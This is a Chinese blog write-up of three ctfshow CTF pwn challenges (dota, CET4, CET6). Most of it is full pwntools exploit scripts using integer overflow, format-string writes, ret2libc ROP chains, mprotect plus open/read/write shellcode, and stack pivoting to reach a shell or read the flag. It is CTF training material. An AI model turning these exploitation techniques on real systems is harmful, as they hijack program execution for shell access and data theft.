ctfshow 摆烂杯 pwn 2/100

已于 2022-02-23 19:32:20 修改
阅读量3.1k 收藏
点赞数
分类专栏: PWN 文章标签: 安全 pwn
于 2022-02-22 23:16:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123076578
版权

dota:

考点:

  • 整数溢出
  • ret2libc
    exp:
from pwn import *
# p = process("./dota")
p = remote("pwn.challenge.ctf.show",28127)
e = ELF("./dota")
p.timeout = 0.5
context.log_level = 'debug'
libc = e.libc
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
stack_addr = p.recvline()
log.success(stack_addr)
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
pl1 = "a"*(0x88) 
pop_rdi = 0x4009b3
pop_rsi = 0x4009b1
puts_got = e.got["puts"]
pl1 += p64(pop_rdi) + p64(puts_got)+p64(0x4005e0) + p64(0x400812)
p.sendline(pl1)
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base = puts_addr - 0x0809c0
log.success(hex(puts_addr))
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
stack_addr = p.recvline()
log.success(stack_addr)
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
sys = libc_base + 0x04f440
sh = libc_base + 0x1b3e9a
pl2 = "a"*(0x88)+p64(0X4005CE) + p64(pop_rdi) + p64(sh) + p64(sys)
p.sendline(pl2)
p.interactive()

CET4:

mprotect 函数解析

  • 开沙箱 ret2libc + orw
    exp:
from pwn import *
p = process("./CET4")
e = ELF("./CET4")
context.log_level = 'debug'
libc = e.libc
context.arch ="amd64"
 
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]

pop_rdi  =0x4013d3
pop_rsi_r15  = 0x4013d1

bss = 0x404000
main = 0x401290

p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl1 = "a"*(0x48) + p64(pop_rdi)+p64(puts_got) + p64(puts_plt) + p64(main)
p.send(pl1)


puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
protect = libc_base + libc.sym["mprotect"]
pop_rdx = 0x1b92 +libc_base
pop_rsi = 0x202f8 + libc_base

p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl2 = "a"*(0x48) + p64(pop_rdi) + p64(0x404000) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx)+ p64(7)+p64(protect) + p64(main)
# gdb.attach(p,"b *0x4013d3")
p.send(pl2)
read=libc_base+libc.sym['read']
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl3 = "a"*(0x48) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x404600)  + p64(pop_rdx) + p64(0x500) + p64(read) + p64(0x404600)
# gdb.attach(p,"b *0x4013d3")
p.send(pl3)
code = shellcraft.open("./flag")
code += shellcraft.read(3, 0x404900, 0x50)
code += shellcraft.write(1, 0x404900, 0x50)
shellcode = asm(code)

p.send(shellcode)
p.interactive()

CET6:

  • 栈迁移+汇编调试
    exp:
from pwn import *
p = process("./CET6")
e = ELF("./CET6")
context.log_level = 'debug'
libc = e.libc
context.arch ="amd64"

pop_rdi = 0x4012f3

p.recvuntil("your name:\n")
p.sendline("a"*(4))
p.recvuntil("QAQ:How was your test???\n")

pl1 = "a"*(0x40) + p64(0x404500) 
pl1 += p64(0x4011ae) 
p.send(pl1)
pl2 = "a"*(0x40) + p64(0x404540)  
pl2+=  p64(0x4011ae) 
# gdb.attach(p,'b *0x4011ae')
p.send(pl2)
puts_got = e.got["puts"] 
puts_plt = e.plt["puts"]
pl3 = "a"*(0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011ae)
p.send(pl3)
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym['puts']

success('libc_base:'+hex(libc_base))

sh=libc_base+libc.search('/bin/sh\x00').next()
system=libc_base+libc.sym['system']
p.send('a'*0x20+p64(pop_rdi)+p64(sh)+p64(system))
p.interactive()
cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow pwn2
qq_39980610的博客
08-19 737
pwn2
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5257
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4055
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
记第一次解PWN题目
天道酬勤
09-02 515
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器附加该程序 #gdb.att...
CTFshow PWN入门 pwn02
question55的博客
09-15 469
ctf pwn 栈溢出漏洞 ctf入门 ctfshow
CTFshow 摆烂杯 pwn
SCP000111的博客
12-27 3127
CTFshow 摆烂杯 pwn 啊啊啊,看着官方脚本调了好久终于调通,为了防止后来的兄弟耽误时间,发个博客。 官方wp dota 这道题还是很简单的,整型溢出+格式化字符串+ROP,可惜当时只做出这一道题 #!/usr/bin/env python # encoding: utf-8 from pwn import* from LibcSearcher import * context.log_level = "debug" p = remote('pwn.challenge.ctf.show',2818
电源技术中的电容是PWN DC/DC转换器中常用的元件
11-16
电容是PWN DC/DC转换器中常用的元件,它与电感一样也是储存电能和传递电能的元件,但对频率的特性却刚好相反。应用上,主要是“吸收 ”纹波,具有平滑电压波形的作用。实际的电容并不是理想的元件。电容器由于有介质...
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
电源技术中的电感是PWN DC/DC转换器中常用的元件
11-16
电感是PWN DC/DC转换器中常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
python_dateutil模块组件
05-27
windows下使用matplotlib的必要模块组件 对应python3.4,32位
CTFSHOW PWN02
m0_74093152的博客
03-22 863
CTFSHOWPWN02
ctfshow刷题记录6(sql注入1)
qq_61109509的博客
02-23 2991
有点杂。。。sql注入web171-173web174解法一 用replacet套娃解法二,布尔盲注脚本web 175解法一 时间盲注脚本解法二 利用读写文件写入网站根目录web176 大小写过滤解法一 万能密码出结果解法二 大小写过滤web177web178web179 sql注入 web171-173 六件套往上呼 1’ order by 3 – - 1’ union select 1,2,database() – - (无法用#进行注释,先用-- -) 爆列名:1’union selec
ctfshow 摆烂杯 writeup
mumuzi的博客
12-26 3571
ctfshow摆烂杯 writeup
【ctfshow摆烂杯 比烂为主】
chuxuezhewocao的博客
06-02 923
ctfshow摆烂杯 比烂为主
ctfshow新手杯(web)
m0_62422842的博客
10-07 2298
前天ctfshow举办的新手杯,里面的部分web题对于我来说还是有必要记录一下的。里面的大师傅都太强了。还有最后一道web,看了官方wp,有种本能的抗拒。这种题涉及的知识点超出了我的学习范围。还得继续积累知识,向大师傅们学习。
ctfshow 摆烂杯
zip471642048的博客
12-25 562
签到题,之前还想跑出来,后面查了一下A³+B³+C³=114是世界未解难题,这题挺简单的。 A=1-1&B=1-1&C=114)-(0
ctfshow pwn——PWN签到题、pwn02
qq_55233040的博客
01-24 4990
PWNPWN签到题pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值